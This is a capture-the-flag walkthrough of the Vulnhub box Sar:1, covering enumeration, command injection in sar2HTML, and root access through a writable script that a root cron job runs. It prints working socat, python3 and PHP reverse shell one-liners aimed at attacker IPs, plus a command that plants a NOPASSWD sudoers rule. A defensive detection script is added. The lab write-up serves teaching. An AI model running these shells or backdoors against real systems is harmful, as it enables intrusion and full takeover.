Sar:1 Vulnhub Walkthrough
Enumeration
Nmap
nmap -sC -sV -oA nmap/sar1 192.168.43.166

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-13 22:37 EDT
Nmap scan report for 192.168.1.112
Host is up (0.0033s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 00:0C:29:46:0D:BC (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.39 seconds
Only one port open! Great!
Dirb
dirb http://192.168.43.166

-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed May 13 22:38:52 2020
URL_BASE: http://192.168.1.112/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.112/ ----
+ http://192.168.1.112/index.html (CODE:200|SIZE:10918)
+ http://192.168.1.112/phpinfo.php (CODE:200|SIZE:95475)
+ http://192.168.1.112/robots.txt (CODE:200|SIZE:9)
+ http://192.168.1.112/server-status (CODE:403|SIZE:278)
-----------------
END_TIME: Wed May 13 22:38:57 2020
DOWNLOADED: 4612 - FOUND: 4
Reverse Shell
Let's navigate to robots.txt

robots.txt contains a single entry, sar2HTML. Replace robots.txt with sar2HTML in the URL.
After Googling for a while, I found a sar2HTML exploit on Exploit-DB.

This means the plot parameter is passed unsanitised into a shell command: a semicolon terminates the command sar2HTML intended to run, and whatever we write after it is executed on the server as the web server user. So this is where we can supply a reverse shell command and get access to the machine. Because the payload travels in a GET parameter, URL-encode it (spaces, ;, &, <, > and quotes), otherwise the query string gets cut up before it reaches the injection point.
nc -nv <IP> <Port> doesn't work, so I use socat to get a reverse shell from it; we can also use python3 to get a reverse shell from it.
Socat
Victim's Machine - socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
Attacking Machine - socat file:`tty`,raw,echo=0 tcp-listen:4444
Python3
Victim Machine - python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Attacking Machine - nc -nlvp <port>
We got a shell!

Navigate to the love user's home directory to get the user flag.
Privilege Escalation
After trying some methods, I found something in the crontab.

It seems there is a file called finally.sh that runs with superuser (sudo) privileges every 5 minutes.
Let's locate the file.

Then cat finally.sh.

finally.sh runs another script, write.sh, which lives in the same folder.

finally.sh is not writable by a normal user, but write.sh is.

So we can append our own commands to write.sh, and they will run as root on the next cron run.
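The check that finds this kind of chain automatically, as an added example that is not code from the walkthrough: it parses system crontab lines, resolves the `cd DIR && sudo ./script.sh` form the box uses, follows scripts that the root job's script invokes, and reports any that are world-writable. The sample crontab, file names and contents in demo() are constructed to mirror the Sar:1 layout; the resolution of wrappers and called scripts is a heuristic, not a shell parser.

```python
"""Find world-writable scripts that a root cron job runs directly or via
another script (the finally.sh -> write.sh chain above).

Added example, not code from the walkthrough. Parses /etc/crontab-format
lines (five schedule fields, user, command). Sample paths and contents in
demo() are constructed.
"""
import os
import re
import stat
import tempfile

SPLIT_RE = re.compile(r'\s*(?:&&|\|\||;)\s*')
WRAPPERS = {'sudo', 'sh', 'bash', '/bin/sh', '/bin/bash', 'nohup'}


def parse_system_crontab(text):
    """Return [(user, command)] for each job line; env assignments and comments skipped."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        fields = line.split()
        if '=' in fields[0]:                       # SHELL=/bin/sh, PATH=...
            continue
        n = 1 if fields[0].startswith('@') else 5  # @reboot etc. use one schedule field
        if len(fields) < n + 2:
            continue
        jobs.append((fields[n], ' '.join(fields[n + 1:])))
    return jobs


def scripts_in_command(command, cwd='/'):
    """Absolute paths of the programs a cron command runs, resolving `cd` and wrapper prefixes."""
    paths = []
    for segment in SPLIT_RE.split(command):
        tokens = segment.split()
        if not tokens:
            continue
        if tokens[0] == 'cd':                      # later relative paths resolve against this dir
            cwd = tokens[1] if len(tokens) > 1 else cwd
            continue
        while tokens and tokens[0] in WRAPPERS:    # sudo ./x.sh, bash x.sh -> x.sh
            tokens.pop(0)
        if tokens and not tokens[0].startswith('-'):
            paths.append(os.path.normpath(os.path.join(cwd, tokens[0])))
    return paths


def called_scripts(script):
    """Scripts a shell script invokes (heuristic: tokens ending in .sh), relative to its directory."""
    try:
        with open(script, errors='replace') as fh:
            lines = fh.read().splitlines()
    except OSError:
        return []
    base = os.path.dirname(script)
    return [os.path.normpath(os.path.join(base, tok))
            for line in lines
            for tok in line.split('#', 1)[0].split()   # drop comments and the shebang
            if tok.endswith('.sh')]


def world_writable(path):
    """True when 'other' has write permission, which is what www-data abuses here."""
    try:
        return bool(os.stat(path).st_mode & stat.S_IWOTH)
    except OSError:
        return False


def writable_root_cron_scripts(crontab_text):
    """World-writable scripts reachable from a root job: the job's script or one it calls."""
    hits = []
    for user, command in parse_system_crontab(crontab_text):
        if user != 'root':
            continue
        for script in scripts_in_command(command):
            for candidate in [script] + called_scripts(script):
                if world_writable(candidate) and candidate not in hits:
                    hits.append(candidate)
    return hits


def demo():
    """Recreate the box's layout in a temp dir (root cron -> finally.sh 0755 -> write.sh 0777)
    and return the hits relative to that dir."""
    tmp = tempfile.mkdtemp()
    finally_sh = os.path.join(tmp, 'finally.sh')
    write_sh = os.path.join(tmp, 'write.sh')
    with open(finally_sh, 'w') as fh:
        fh.write('#!/bin/sh\n./write.sh\n')          # constructed content
    with open(write_sh, 'w') as fh:
        fh.write('#!/bin/sh\ntouch /tmp/gateway\n')  # constructed content
    os.chmod(finally_sh, 0o755)
    os.chmod(write_sh, 0o777)
    crontab = 'SHELL=/bin/sh\n' + f'*/5 * * * * root cd {tmp} && sudo ./finally.sh\n'  # constructed
    return [os.path.relpath(h, tmp) for h in writable_root_cron_scripts(crontab)]


if __name__ == '__main__':
    print('sample layout:', demo())
    if os.path.exists('/etc/crontab'):             # then the real system crontab, if readable
        with open('/etc/crontab') as fh:
            print('/etc/crontab:', writable_root_cron_scripts(fh.read()))
```

On the box the same check run against the real /etc/crontab is what turns the "something in crontab" observation into the exact file to append to; the fix on the defender's side is the mirror image, no root job may execute anything a lower-privileged user can write.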
Method 1
Append a PHP reverse shell to write.sh (the $ and the inner double quotes are escaped so the shell neither expands $sock nor cuts the string short):
echo "php -r '\$sock=fsockopen(\"10.0.0.1\",1234);exec(\"/bin/sh -i <&3 >&3 2>&3\");'" >> write.sh
Then go to the attacking machine and set up a listener on the same port as in the payload:
nc -lvp 1234
Wait up to 5 minutes and you will get a shell, and it is root!

Method 2
Have the root cron job add a sudoers rule for www-data. www-data cannot write /etc/sudoers itself, so the echo is appended to write.sh and runs on the next cron run; the rule needs the host and runas fields, because sudo refuses to run at all if /etc/sudoers fails to parse:
echo 'echo "www-data ALL=(ALL) NOPASSWD: /bin/bash" >> /etc/sudoers' >> write.sh
Wait for 5 minutes, then type sudo -l and you will see that www-data can execute /bin/bash without a password, as we set up earlier.
sudo /bin/bash to get root!

Navigate to /root to get the flag!

Congratulations!